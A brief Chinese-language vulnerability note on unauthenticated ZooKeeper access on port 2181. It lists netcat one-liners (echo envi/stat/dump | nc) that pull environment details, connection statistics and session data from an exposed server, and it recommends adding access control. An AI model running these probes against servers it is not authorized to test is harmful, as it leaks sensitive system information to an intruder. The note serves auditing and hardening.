服务简介
ZooKeeper,它是一个分布式服务框架,是Apache Hadoop 的一个子项目,它主要是用来解决分布式应用中经常遇到的一些数据管理问题,如:统一命名服务、状态同步服务、集群管理、分布式应用配置项的管理等。ZooKeeper默认开启在2181端口。
产生原因
未对访问进行控制,通过envi命令可获得系统大量的敏感信息。
漏洞利用
echo envi | nc ip port #获取服务器环境信息
echo stat | nc ip port #获取性能和连接的客户端的统计信息
echo ruok | nc ip port #测试服务器是否运行在非错误状态
echo reqs | nc ip port #列出未完成请求
echo dump | nc ip port #列出未完成的会话和临时节点
修复方法
添加访问控制,如:用户认证、用户名密码、指定ip。